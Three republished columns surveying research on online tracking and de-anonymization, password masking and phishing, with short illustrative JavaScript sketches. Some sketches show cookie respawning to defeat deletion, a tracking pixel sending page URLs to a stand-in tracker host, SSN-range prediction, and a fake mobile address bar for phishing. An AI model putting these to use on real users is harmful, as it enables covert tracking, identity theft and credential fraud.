The State of User Tracking and the Impossibility of Anonymizing Data

What we think is reasonable, commonplace, or even possible in terms of protecting or violating online privacy shifts constantly. Recent developments in tools and techniques for tracking online behavior and identifying individuals from supposedly anonymized data sets should cause us to reevaluate what is possible.

Katherine McKinley of iSEC Partners published a detailed analysis of how popular browsers and browser extensions handle cookies and other methods of local data storage used for tracking users in her December 2008 paper Cleaning Up after Cookies (PDF). McKinley tested the ability of browsers and extensions to clear private data, as well as their “private browsing” features. She found that most browsers attempted to clear previously stored private data but often left some of it accessible. Adobe Flash, by contrast, made no attempt to remove its stored data and in fact stored it in such a way that it circumvented most of the privacy protections browsers offer. iSEC Partners created an online version of the tests used in the paper so that individuals can check their own configurations. It is available at Breadcrumbs Tracker.

The August 2009 paper Flash Cookies and Privacy, by Ashkan Soltani, Shannon Canty, Quentin Mayo, Lauren Thomas, and Chris Jay Hoofnagle at UC Berkeley, focuses directly on the privacy issues raised by Flash cookies. The authors surveyed the top 100 web sites, as ranked by QuantCast in July 2009, and found that more than half of them used Flash cookies. They note that, unlike standard HTTP cookies, Flash cookies have no expiration date and are stored in a different, harder-to-find location on the file system. Most cookie management tools will not delete this type of cookie, and Flash cookies remain in place even when private browsing mode is enabled. The authors found that Flash cookies were frequently employed to track users who had explicitly attempted to prevent cookie tracking: the Flash cookie was used to regenerate, or “respawn,” an HTTP cookie that the user had deleted.
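
To make the respawning technique concrete, here is a minimal, hypothetical sketch of the pattern the paper describes. The function getFlashId() is a made-up stand-in for an ExternalInterface call into a Flash movie that reads the Local Shared Object, and the cookie name is also invented.

```javascript
// Hypothetical cookie "respawning" sketch: if the user deleted the HTTP
// cookie, restore the tracking ID from the Flash Local Shared Object,
// which normal browser cookie controls do not clear.
function ensureTrackingId() {
  var match = document.cookie.match(/(?:^|; )uid=([^;]+)/);
  if (match) return match[1];            // HTTP cookie still present
  var flashId = getFlashId();            // assumed bridge into the Flash LSO
  if (flashId) {
    // Respawn the deleted HTTP cookie from the Flash copy.
    document.cookie = 'uid=' + flashId +
      '; expires=Fri, 31 Dec 2038 00:00:00 GMT; path=/';
    return flashId;
  }
  return null;
}
```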

Most online services use multiple tracking services for analytics, performance monitoring, and usability analysis. A mixture of JavaScript-based tracking code and cookies is the most common method of user tracking. The paper On the Leakage of Personally Identifiable Information Via Online Social Networks (PDF), presented at the ACM Workshop on Online Social Networks by Balachander Krishnamurthy and Craig Wills, describes the techniques advertising firms and social network services use to track users and the types of information they release. The authors studied information leakage from twelve online social networks and found that the bulk of user information is released through HTTP headers and third-party cookies.
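
As an illustration of the leakage mechanism the paper describes, consider a hypothetical third-party tracking script embedded in a social network page; all names and URLs below are invented. The page URL, which often embeds the user's profile ID, reaches the tracker via the Referer header or an explicit query parameter, and the browser attaches the tracker's own third-party cookie to the same request, letting the tracker join its anonymous cookie ID to a real identity.

```javascript
// Hypothetical third-party tracker embedded by a social network page.
(function () {
  var img = new Image();
  // The page URL (e.g. http://social.example/profile.php?id=12345) is sent
  // explicitly here, and is also leaked via the Referer header.
  img.src = 'http://tracker.example/pixel?page=' +
    encodeURIComponent(document.location.href) +
    '&cb=' + new Date().getTime(); // cache buster
  // The browser automatically attaches tracker.example's third-party
  // cookie to this request, tying that cookie ID to the profile ID.
})();
```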

In his post Netflix’s Impending (But Still Avoidable) Multi-Million Dollar Privacy Blunder on the Freedom to Tinker blog, Paul Ohm discusses his 2009 publication Broken Promises of Privacy: Responding to the Surprising Failure of Anonymization in the context of the announcement of the second Netflix Prize to improve the accuracy of Netflix’s predictions. Ohm argues that it is not possible to anonymize the data and that it is irresponsible, and possibly illegal, to release it. For the original contest, Netflix released about half a million anonymized subscriber records for analysis, and the one million dollar prize drew a significant number of researchers into the contest.

Soon after Netflix released the records, researchers Arvind Narayanan and Vitaly Shmatikov showed they could identify individual subscribers by combining the Netflix data with other databases. Their publication Robust De-anonymization of Large Sparse Datasets (PDF), presented at the 2008 IEEE Symposium on Security and Privacy, describes how to break the anonymity of the Netflix Prize dataset. Narayanan and Shmatikov continued their research and demonstrated de-anonymizing social networks such as Twitter in De-Anonymizing Social Networks (PDF) (paper FAQ), a paper presented at the 2009 IEEE Symposium on Security and Privacy. Ohm reminds readers of the scandal that occurred in 2006 when AOL researchers Greg Pass, Abdur Chowdhury, and Cayley Torgeson presented their paper A Picture of Search (PDF) at the first International Conference on Scalable Information Systems. The authors released the anonymized dataset they analyzed in the paper, which covered more than six hundred thousand AOL users; some individuals were subsequently identified.
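
The core of the Netflix attack is a similarity search: an attacker who knows a handful of a target's ratings, perhaps scraped from a public IMDb profile, scores every anonymized record against that auxiliary information, weighting matches on obscure titles more heavily. The sketch below is an illustrative simplification of that idea, not the authors' actual scoring function; all names and data shapes are assumed.

```javascript
// Illustrative de-anonymization sketch: find the anonymized record that
// best matches the target's known ratings, weighting rare movies higher.
// popularity[movie] = number of subscribers who rated the movie (>= 1).
function bestMatch(auxRatings, records, popularity) {
  var best = null, bestScore = -Infinity;
  records.forEach(function (record) {
    var score = 0;
    Object.keys(auxRatings).forEach(function (movie) {
      var r = record.ratings[movie];
      if (r !== undefined && Math.abs(r - auxRatings[movie]) <= 1) {
        // A match on a long-tail title is strong identifying evidence.
        score += 1 / Math.log(1 + popularity[movie]);
      }
    });
    if (score > bestScore) { bestScore = score; best = record; }
  });
  // The real algorithm also requires a clear gap between the best and
  // second-best scores ("eccentricity") before declaring a match.
  return best;
}
```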

Carnegie Mellon University professor Latanya Sweeney developed the foundation for much of the current work on de-anonymizing data sets. Her paper All the Data on All The People (only the abstract is publicly available), published in 2000, showed that it is possible to identify individuals in US Census data using only a few variables. The paper argues that almost 90% of the US population can be identified using only full date of birth, gender, and ZIP code.
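
Sweeney's result rests on the observation that a few innocuous fields combine into a nearly unique "quasi-identifier." A minimal sketch of how one might measure this on a data set follows; the record shape and field names are assumptions for illustration.

```javascript
// Count how many records are uniquely identified by the quasi-identifier
// (date of birth, gender, ZIP) alone. Field names are illustrative.
function countUniquelyIdentifiable(records) {
  var buckets = {};
  records.forEach(function (r) {
    var key = [r.dateOfBirth, r.gender, r.zip].join('|');
    buckets[key] = (buckets[key] || 0) + 1;
  });
  return records.filter(function (r) {
    return buckets[[r.dateOfBirth, r.gender, r.zip].join('|')] === 1;
  }).length;
}
```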

Alessandro Acquisti and Ralph Gross (no relation) presented their research on Predicting Social Security Numbers from Public Data. The authors demonstrate that it is possible to automate the process of predicting an individual’s Social Security Number (SSN) for large portions of the population using public information. The information used to create the predictions is easily harvested from social networking sites, voter registration records, and commercial databases. Acquisti and Gross argue that we must reconsider our policies around the use of SSNs, which are commonly used for authentication and frequently abused by identity thieves.
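
The attack exploits the fact that SSNs were long assigned in a largely predictable order within each state, so publicly known (birth date, SSN) pairs, such as those in the Social Security Death Master File, bracket the likely numbers for a target born between them. The following is a deliberately simplified sketch of that interpolation idea, not the authors' statistical model; all data and names are invented.

```javascript
// Simplified SSN-prediction sketch: given (birth date, SSN) anchor pairs
// from the same state, sorted by birth date, bracket the likely SSN range
// for a target born between two anchors. Illustrative only.
function predictSsnRange(anchors, targetBirthDate) {
  var before = null, after = null;
  anchors.forEach(function (a) {
    if (a.birthDate <= targetBirthDate) before = a;
    if (a.birthDate >= targetBirthDate && after === null) after = a;
  });
  if (!before || !after) return null; // target falls outside known anchors
  return { low: before.ssn, high: after.ssn };
}
```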

* This article originally appeared as The State of User Tracking and the Impossibility of Anonymizing Data in my Messaging News “On Message Column.”

Trends in Password Masking Security and Usability

John Gruber’s Daring Fireball pointed me to Jakob Nielsen’s Alertbox column Stop Password Masking, which resulted in a thoughtful and interesting thread of conversations and a few experimental solutions. Password masking refers to the practice of displaying an alternate character, usually a star or a bullet, in place of the actual characters typed into a password field. The idea is that this prevents another party from viewing the password while it is entered. Nielsen argues that in most cases masked passwords are not needed, since shoulder surfing is not a major issue, and that it is even less of an issue on mobile devices. He says masked passwords often reduce usability by increasing the number of errors, since users cannot see what they are typing. The problem is further compounded on mobile devices, where typing is more difficult and slower. Because users are less certain about what they are typing, they are much more likely to choose simplistic passwords or to copy and paste passwords from less secure locations. Nielsen says that high-value password forms should offer an optional checkbox for masking passwords so that masking can be used on an as-needed basis.

Jason Montgomery’s Response to Nielsen’s “Stop Password Masking” on the SANS Institute’s Application Security Street Fighter Blog provides a more nuanced commentary on the tradeoffs between security and usability in password masking. Montgomery argues that Nielsen’s points are valid and suggests that password managers, pass phrases, and two-factor authentication can sidestep some of the problems by increasing the security of stored passwords as well as the ease of recalling them. Earlier, I reviewed 1Password, a password manager for the Mac and iPhone that I use daily.

Bruce Schneier, a respected security expert, agreed with Nielsen in his brief response, The Problem with Password Masking. His post generated a large number of comments, which led Schneier to temper his opinion in a later article, The Pros and Cons of Password Masking. Schneier concludes that even though there are significant downsides to password masking, the practice is less problematic than either not masking passwords at all or complicating the interface with an optional password masking checkbox. The second article also generated a thoughtful discussion in the comments. In Strong Web Passwords, Schneier summarizes the USENIX HotSec ’07 article Do Strong Web Passwords Accomplish Anything? by Florencio, Herley, and Coskun, which argues that complex passwords do little to increase security when adequate policies are in place to limit the number of password attempts. Schneier suggests that the password masking used on BlackBerries with SureType (non-QWERTY) keyboards and on the iPhone (see: iPhone 2.0 password masking), which shows the current character and masks all previous characters, is a reasonable alternative.
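
For readers curious how that style of masking might work in a Web form, here is a rough jQuery sketch in the spirit of the prototypes discussed below. It mirrors the true value into a hidden field and repaints the visible field as bullets plus the most recent character; the element IDs are invented, and edge cases such as mid-string edits are ignored.

```javascript
// iPhone/SureType-style masking sketch: show only the last character typed.
// #password-real is a hidden input holding the true value for submission.
$('#password-visible').keyup(function () {
  var $shadow = $('#password-real');
  var shown = $(this).val();
  var real = $shadow.val();
  if (shown.length > real.length) {
    real += shown.slice(real.length);      // append newly typed characters
  } else {
    real = real.slice(0, shown.length);    // characters deleted from the end
  }
  $shadow.val(real);
  // Repaint: bullets for all but the most recently typed character.
  $(this).val(real.length
    ? new Array(real.length).join('\u2022') + real.slice(-1)
    : '');
});
```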

Farhad Manjoo’s Slate Magazine column, Fix your terrible, insecure passwords in five minutes, offers a solid set of suggestions for creating better passwords and describes why this is important in light of the recent Twitter break-in. Macworld’s Joe Kissell offers his own set of suggestions for creating better passwords in a series of articles listed in Top password tips.

The ongoing discussion led several developers to create prototypes that demonstrate password masking techniques. Each implementation has an online demo and publicly available source code, and all of the prototypes are currently built with jQuery.

  • Stefan Ullrich’s iPhone-like password fields using jQuery and Oliver Storm’s Mypass each implement a password masking field similar to those on the iPhone and on BlackBerries with SureType: the most recently typed character is displayed, but all previous characters are masked by replacing them with bullets.
  • Byron Rode’s showPassword is a jQuery plugin that implements a password entry field that defaults to fully masking the password with bullets, but also includes Nielsen’s proposed checkbox to display the password when requested.
  • arc90 created two experimental password masking implementations. The first, HalfMask, creates a masking effect by placing translucent random characters on top of the original password characters. This allows the person entering the password to read the original with some concentration, but makes it far more difficult for another person to casually observe the password. The second implementation, HashMask, masks the password in the standard way by replacing each character typed with a bullet, but adds a visual representation of the password in the form of a sparkline. The person entering the password thus gets a visual indication that it is correct, although they need to remember what their sparkline looks like.
  • Mattt Thompson’s Chroma-Hash was inspired by arc90’s HashMask and masks passwords in the standard way, but adds a visualization of the password as it is typed, using colored bars generated from a hash of the password (a rough sketch of the idea follows this list). This allows users to quickly check that the visual representation is correct before submitting. It has the side benefit of allowing fast comparisons when password confirmations are required for entering new or changed passwords. Lee Gao created pyChroma, a Chroma-Hash implementation in Python, which has source code but unfortunately no online demo.
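
As promised, here is a minimal sketch of the Chroma-Hash idea, not Thompson's actual plugin: hash the password as it is typed and use slices of the digest as CSS colors. hexDigest() stands in for any JavaScript hash library (an MD5 implementation, for example), and the element IDs and salt are invented; salting the hash makes observed colors harder to replay across sites.

```javascript
// Chroma-Hash-style visualization sketch: derive three color swatches
// from a salted hash of the password as the user types.
$('#password').keyup(function () {
  var digest = hexDigest($(this).val() + 'per-site-salt'); // assumed helper
  // Use three 6-hex-digit slices of the digest as background colors.
  $('#swatches span').each(function (i) {
    $(this).css('background-color', '#' + digest.substr(i * 6, 6));
  });
});
```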

Finally, Kevin Vigneault considers several other related options in his post Confirming Passwords Is Annoying: Is There a Better Way?, which grew out of the IxDA thread “Confirm password” field – Superfluous?, started several months before Nielsen’s column.

* This article originally appeared as Trends in Password Masking Security and Usability in my Messaging News “On Message Column.” Article updated July 31st, 2009 to add additional references.

You Can Fool Some of the People All of the Time: Research on Phishing

Duping users into revealing their private data goes back decades, but it wasn’t until the late 1990s that “phishing” became the word to describe the practice. Today, phishing costs banks, service providers, and consumers billions of dollars per year, and companies are working frantically to limit the damage. A Gartner survey estimated that more than three and a half billion dollars were lost to phishing in the United States in 2007 alone.

Phishing typically refers to the creation of a fraudulent but realistic-looking Web service or application to collect personal information such as username and password pairs, bank account numbers, credit card numbers, and Social Security numbers. These credentials are then used for everything from spamming operations to bank fraud and identity theft. In some cases the phishing site is not a separate fraudulent site at all: a legitimate server has been compromised, or its front end is vulnerable to Cross-Site Scripting (XSS) attacks or Cross-Site Request Forgery (CSRF/XSRF). In other cases attackers combine multiple techniques, including viruses and other malware.

With more than a billion people online, ensuring that none of them fall prey to phishers is nearly impossible. The stakes are high, so industry is putting tremendous effort into preventing and mitigating phishing, and that effort has done much to stave off the problem even as the number and sophistication of attacks have rapidly increased. There is also a significant amount of academic and industrial research into phishing that has received limited exposure in the press. In this article, I will summarize several important contributions from the last few years, as well as outlets to investigate for further research. One common theme across these papers is the recognition that usability and design are tightly connected to the effectiveness of security implementations.

Users Too Trusting

One of the most remarkable aspects of the problem is that despite warnings, many users will fall for even basic phishing attempts. In The Emperor’s New Security Indicators, presented at the 2007 IEEE Symposium on Security and Privacy, Schechter, Dhamija, Ozment, and Fischer show that users will continue to enter credentials into online banking sites even when security indicators are removed and warnings are displayed. For example, among the roughly half of the users who completed the study using their own personal accounts, 92 percent continued to log in even after the user-selected verification image (offered on sites such as Bank of America, Vanguard, and Yahoo!) was removed and replaced with a note saying that the security system was currently being upgraded.

Sadly, the efforts by vendors to help users recognize phishing often fail. One paper presented at the Conference on Usability, Psychology, and Security (UPSEC ’08) indicates the difficulties that services face when attempting to mitigate phishing attacks. In RUST: A Retargetable Usability Testbed for Website Authentication Technologies, Johnson, Atreya, Aviv, Raykova, Bellovin, and Kaiser built on the work of Schechter et al. to evaluate Microsoft CardSpace and VeriSign Secure Letterhead. The authors found that even though the vendors had made explicit design choices intended to resist phishing, users of these new authentication technologies could still be guided to a fraudulent Web site at an earlier point in the interaction. For example, most users who received an email directing them to a “secure” site would still enter their credentials if the site looked relatively convincing and they received a message saying the site was partially down for maintenance.

User Passwords

One successful phish can be applied across multiple accounts. One study, A Large-Scale Study Of Web Password Habits, presented at the 16th International Conference on World Wide Web (WWW ’07) by Dinei Florencio and Cormac Herley of Microsoft Research, describes findings from an experiment that collected data about accounts and passwords from more than half a million Microsoft Toolbar users. It is widely accepted that most individuals maintain a limited number of passwords compared to the number of places where they need to enter one: typically, one password for sites they consider very secure, such as online banking, and several passwords for sites they consider less secure. Users increase the number of passwords when sites require frequent password changes or impose specific restrictions on combinations of numbers, letters, or punctuation characters. The problem is that in current practice large service providers are not islands. We know that individuals reuse credentials across sites and therefore likely have the same credentials at both large and small sites, meaning that each site has the potential to be the weakest link in a global authentication chain.

Florencio and Herley’s research is useful and important because it provides a large sample of user behavior surrounding passwords and account use. The authors found that the “average user has 6.5 passwords, each of which is shared across 3.9 different sites. Each user has about 25 accounts that require passwords, and types an average of eight passwords per day.” Their data showed that 0.4 percent of users type their credentials into verified phishing sites each year, and that users forget their passwords frequently; in the case of Yahoo!, about 1.5 percent of users do so each month. This means that the mechanisms to recover or reset passwords when users forget them are critical.

Ariel Rabkin presented Personal Knowledge Questions for Fallback Authentication: Security Questions in the Era of Facebook at the 4th Symposium on Usable Privacy and Security (SOUPS ’08). His research examines the additional security questions typically used during password recovery when the user has forgotten his or her password. Rabkin evaluated the security questions from twenty banking and investment Web sites and sorted them into categories: ambiguous (could have more than one answer); not memorable (the user is likely to forget); inapplicable (not relevant to the user); guessable (likely to be obvious); attackable (information available on social networks); automatically attackable (possible to harvest data and test); and secure. Only slightly more than one-third of all questions were classified as secure. This is troubling, as many of the sites employed neither CAPTCHAs, to deter simple automated attacks, nor two-factor authentication, such as SMS, as an additional layer of verification during password recovery, even when they provided these mechanisms for standard authentication.

A new frontier for those who run phishing scams is attacking the browsers on gaming and mobile devices. The number of consumer devices with full-featured browsers is growing rapidly and is already far from trivial: in March 2009 Apple announced that it had shipped more than 30 million iPhone and iPod touch devices, and Nintendo announced that it had shipped more than 100 million Nintendo DS units. Also at UPSEC ’08, Niu, Hsu, and Chen presented iPhish: Phishing Vulnerabilities on Consumer Electronics, which examined the Web browsers on three consumer devices: the Apple iPhone and two gaming devices, the Nintendo DS and Nintendo Wii. The authors conducted a study with iPhone users and found that design choices made for the limited screen real estate of the device made it impossible for even knowledgeable, security-savvy users to adequately evaluate potential phishing sites. For example, there are no explicit anti-phishing protections built into either the mail client or the browser (this feature is slated for delivery in summer 2009) that could indicate to the user that something was amiss. In the iPhone browser the URL was often abbreviated and easily faked with specialized JavaScript, while in the gaming devices’ browsers the URL was often elided entirely by default and no SSL indicator was available.
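
To illustrate the kind of URL fakery the paper alludes to, here is a hedged sketch of a classic Mobile Safari-era trick: scroll the page slightly so the real address bar slides out of view, then draw a fake bar at the top. The markup and IDs are invented, and the details varied across browser versions.

```javascript
// Hypothetical address-bar spoof sketch for early Mobile Safari.
window.addEventListener('load', function () {
  // Nudge the page down so the browser hides its real address bar.
  setTimeout(function () { window.scrollTo(0, 1); }, 0);
  // Draw a fake bar showing the victim site's URL at the top of the page.
  var bar = document.createElement('div');
  bar.id = 'fake-url-bar'; // styled elsewhere to mimic the browser chrome
  bar.textContent = 'https://www.bank.example/login';
  document.body.insertBefore(bar, document.body.firstChild);
});
```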

* This article originally appeared as You Can Fool Some of the People All of the Time: Research on Usability, Security and Phishing in the April 2009 issue of Messaging News.